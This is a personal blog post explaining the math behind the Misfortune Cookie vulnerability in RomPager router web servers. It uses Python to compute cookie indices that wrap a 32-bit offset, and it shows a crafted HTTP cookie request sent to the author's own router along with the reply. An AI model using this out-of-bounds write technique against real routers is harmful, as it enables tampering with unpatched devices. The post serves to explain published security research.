<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cookie Math &middot; Hrvoje&#39;s Blog</title>

    <meta name="description" content="">

    <meta name="generator" content="Hugo 0.73.0" />
    <meta name="twitter:card" content="summary">
    
    <meta name="twitter:title" content="Cookie Math &middot; Hrvoje&#39;s Blog">
    <meta name="twitter:description" content="">

    <meta property="og:type" content="article">
    <meta property="og:title" content="Cookie Math &middot; Hrvoje&#39;s Blog">
    <meta property="og:description" content="">

    <link href='//fonts.googleapis.com/css?family=Source+Sans+Pro:400,700|Oxygen:400,700' rel='stylesheet' type='text/css'>
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/pure-min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-min.css">

    <link rel="stylesheet" href='https://blog.hrvoje.org/css/all.min.css'>
    <link rel="stylesheet" href='https://blog.hrvoje.org/css/syntax.css'>

    <link rel="alternate" type="application/rss+xml" title="Hrvoje&#39;s Blog" href='https://blog.hrvoje.org/index.xml' />
</head>
<body>


<div id="layout" class="pure-g">
    <div class="sidebar pure-u-1 pure-u-md-1-6">
    <div class="header">
        <hgroup>
            <h1 class="brand-title"><a href="https://blog.hrvoje.org/">Hrvoje&#39;s Blog</a></h1>
            <h2 class="brand-tagline"> It&#39;s only ones and zeros </h2>
        </hgroup>
        <nav class="nav">
            <ul class="nav-list">
                
                <li class="nav-item">
                    <a class="pure-button" href="https://www.linkedin.com/in/hcavrak">
                        <i class="icon-linkedin"></i> LinkedIn
                    </a>
                </li>
                
                
                <li class="nav-item">
                    <a class="pure-button" href="https://twitter.com/hcavrak">
                        <i class="icon-twitter"></i>Twitter
                    </a>
                </li>
                
                
                <li class="nav-item">
                    <a class="pure-button" href="https://github.com/hrvach">
                        <i class="icon-github"></i>Github
                    </a>
                </li>
                
                
                <li class="nav-item">
                    <a class="pure-button" href='https://blog.hrvoje.org/index.xml'>
                        <i class="icon-rss"></i> rss
                    </a>
                </li>
            </ul>
        </nav>
    </div>
</div>


    <div class="content pure-u-1 pure-u-md-3-4">
        <div>
            
            <div class="posts">
                <h1 class="content-subhead">17 Jan 2015, 15:53</h1>
                <section class="post">
                    <header class="post-header">

                        <a href="https://blog.hrvoje.org/2015/01/cookie-math/" class="post-title">Cookie Math</a>

                        <p class="post-meta">
                            
                            
                                under 
                                
                            
                        </p>
                    </header>
                    
                    <div class="post-share">
                        <div class="post-share-links">
                            <h4 style="">Share</h4>
                            
                            
                            
                            
                        </div>
                    </div>
                    
                    <div class="post-description">
                        <p>There was a very interesting presentation at the last 31C3 conference given by
two very talented security researchers: Shahar Tal and Lior Oppenheim. The
vulnerability they found targets many different routers from various
manufacturers and was, apparently, patched 10 years ago (!) by the software
company who made RomPager, the software in question. Let&rsquo;s just say vendors are
slow in deploying patches, leaving tens of millions of routers vulnerable to
potential remote bricking, turning into botnets or who knows what else. It was
named Misfortune Cookie for a good reason, but what does that have to do with
math?</p>
<p>Apparently, there is a preallocated array in the webserver capable of
storing 10 cookies, 40 bytes each. The cookie number is used as array index -
converted to integer, multiplied by 40 and added to a memory address to read or
write the correct location without ever checking boundaries.</p>
<p>You can pass an arbitrary number and address any memory location relative to a
certain fixed point in memory. The only catch is that it gets multiplied by 40.
What can you do if you need better precision to avoid overwriting something
else near the memory location you are targeting?</p>
<p>This can be written in a form of <em>ax ≡ y (mod m)</em> and it&rsquo;s called a <strong>Linear
Congruence</strong>. Obviously, <em>a</em> is 40 since we move in steps of 40. We need to find
such <em>x</em> that multiplied by 40 gives us a desired <em>y</em> modulo <em>m</em> we need to move in
memory relative to the present location. <em>M</em> is
<img src="/img/6de36bf7be6aa5ef824c78d2a53af445.svg" alt=""> (the size of a 32 bit
number could fit 0-4294967295, anything more than that and it will
overflow and start from zero again, just like a clock face starts from
1 when it reaches 12), making the equation 40 <em>x</em> ≡ <em>y</em> (mod
<img src="/img/6de36bf7be6aa5ef824c78d2a53af445.svg" alt="">).</p>
<p>For this to have a solution, <em>x</em> needs to be divisible with the greatest common
divisor of both 40 and <img src="/img/6de36bf7be6aa5ef824c78d2a53af445.svg" alt="">,
which is 8 - that&rsquo;s how many unique solutions we&rsquo;ll get. Now we can
say <img src="/img/0f7bd51a44b079c25b804097660feeaa.svg?style=centerimg" alt="">
and reduce the expression to <em>5x ≡ z (mod 536870912)</em>. The way
to solve it is to find the multiplicative inverse modulo <em>m</em> - a
number we can multiply both sides with so that it gives 1 when
multiplied by 5 in this modular algebra.</p>
<p><img src="/img/34545203a13436a11e4a84f30d8d4825.svg?style=centerimg" alt=""></p>
<p>To get the other solutions, we need to keep adding the modulus value
(<em>536870912</em>) to the result and reduce when needed.  The referer is located at
<em>0x2e48</em> to the LEFT of the cookie array. Since we cannot go backwards, we would
like to add <em>0xffffd1b8</em> to overflow 32 bit number and end up at the desired
address.</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="k">def</span> <span class="nf">calc</span><span class="p">(</span><span class="n">a</span><span class="p">):</span> <span class="k">return</span> <span class="p">((</span><span class="n">a</span><span class="o">/</span><span class="mi">8</span><span class="p">)</span><span class="o">*</span><span class="mi">214748365</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)</span>
<span class="o">&gt;&gt;&gt;</span> <span class="nb">sorted</span><span class="p">([(</span><span class="n">calc</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="s1">&#39;0xffffd1b8&#39;</span><span class="p">,</span><span class="mi">16</span><span class="p">))</span><span class="o">+</span><span class="n">i</span><span class="o">*</span><span class="mi">536870912</span><span class="p">)</span><span class="o">%</span><span class="p">(</span><span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">8</span><span class="p">)])</span>
<span class="p">[</span><span class="mi">322122251</span><span class="p">,</span> <span class="mi">858993163</span><span class="p">,</span> <span class="mi">1395864075</span><span class="p">,</span> <span class="mi">1932734987</span><span class="p">,</span> <span class="mi">2469605899</span><span class="p">,</span> <span class="mi">3006476811</span><span class="p">,</span> <span class="mi">3543347723</span><span class="p">,</span> <span class="mi">4080218635</span><span class="p">]</span>

<span class="c1"># -- Let&#39;s do a check. </span>

<span class="o">&gt;&gt;&gt;</span> <span class="nb">hex</span><span class="p">((</span><span class="mi">322122251</span><span class="o">*</span><span class="mi">40</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">))</span>
<span class="s1">&#39;0xffffd1b8&#39;</span>
</code></pre></div><p>Now let&rsquo;s try it on my router!</p>
<pre><code>
send: 'GET / HTTP/1.1\r\nHost: 192.168.1.1:7547\r\nCookie: C322122251=/referer-test.html;\r\n\r\n'
reply: 'HTTP/1.1 404 Not Found\r\n'
header: Content-Type: text/html
header: Transfer-Encoding: chunked
header: Server: RomPager/4.07 UPnP/1.0
header: EXT:
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Object Not Found&lt;/title&gt;&lt;/head&gt;&lt;body&gt;
&lt;h1&gt;Object Not Found&lt;/h1&gt;The requested URL '/' was not found on the RomPager server.
&lt;p&gt;Return to &lt;A HREF=&quot;/referer-test.html&quot;&gt;last page&lt;/A&gt;&lt;p&gt;
&lt;/body&gt;&lt;/html&gt;        ^^^^^^^^^^^^^^^^^^

</code></pre><h3 id="is-there-another-way">Is there another way?</h3>
<p>It&rsquo;s not necessary to find a general solution, sometimes thinking differently can work too.</p>
<p><img src="/img/9fa74eae64b690861a49311b6cad1e9e.svg?style=centerimg" alt=""></p>
<p>How many additional bits can multiplying by 40 add to a number&rsquo;s binary
representation? It&rsquo;s between 32 (that&rsquo;s
<img src="/img/d851672c7ed2542e2950e6444c9c1d7a.svg" alt="">) and 64 (that&rsquo;s
<img src="/img/3eec1d4b188ea063f48ce9d3eac2dc3d.svg" alt="">), so we have to assume 6
bits. The question becomes, which number multiplied by 40 and with 6
most significant bits discarded is equal to our input variable <em>y</em>?
The router CPU might be stuck with 32 bits, but Python isn&rsquo;t. Why not
simply reconstruct these discarded bits by testing each case?  Guess
what the discarded value might have been and divide by 40 to check if
the assumption was correct. For just 6 bits added, it isn&rsquo;t terribly
inefficient to check all possibilities and it goes to prove there are
many ways to address a problem.  Pun intended! :)</p>
<pre><code>  Start with 4294955448 in binary form.
          11111111111111111101000110111000

  Multiplying by 40 gives 171798217920. In binary, that's
  100111  11111111111110001100010011000000
 overflow
</code></pre><p>The 100111 is simply too much to store in a 32 bit memory unit so it gets
discarded, and the rest we called <em>y</em>. We now need to do this in reverse,
starting from <em>y</em>, guessing the discarded part and checking if division by
40 gives the starting value. If it does - that&rsquo;s it.</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="n">t</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="s1">&#39;0xffffd1b8&#39;</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>

<span class="o">&gt;&gt;&gt;</span> <span class="p">[</span><span class="n">i</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">map</span><span class="p">(</span><span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="p">((</span><span class="n">a</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)</span><span class="o">+</span><span class="n">t</span><span class="p">)</span><span class="o">/</span><span class="mi">40</span><span class="p">,</span> <span class="nb">range</span><span class="p">(</span><span class="mi">64</span><span class="p">))</span> <span class="k">if</span> <span class="p">(</span><span class="n">i</span><span class="o">*</span><span class="mi">40</span><span class="p">)</span><span class="o">%</span><span class="p">(</span><span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)</span><span class="o">==</span><span class="n">t</span> <span class="ow">and</span> <span class="n">i</span><span class="o">&lt;</span><span class="p">(</span><span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)]</span>
<span class="p">[</span><span class="mi">322122251</span><span class="p">,</span> <span class="mi">858993163</span><span class="p">,</span> <span class="mi">1395864075</span><span class="p">,</span> <span class="mi">1932734987</span><span class="p">,</span> <span class="mi">2469605899</span><span class="p">,</span> <span class="mi">3006476811</span><span class="p">,</span> <span class="mi">3543347723</span><span class="p">,</span> <span class="mi">4080218635</span><span class="p">]</span>

</code></pre></div><p>So the next time you complain learning math is silly when studying for a CS
degree, just remember you might actually need it!</p>
                    </div>
                    
                </section>
            </div>
            <div class="footer">
    <div class="pure-menu pure-menu-horizontal pure-menu-open">
        <ul>
            <li>Powered by <a class="hugo" href="https://gohugo.io/" target="_blank">hugo</a></li>
        </ul>
    </div>
</div>


        </div>
    </div>
</div>


<script>
</script>


</body>
</html>
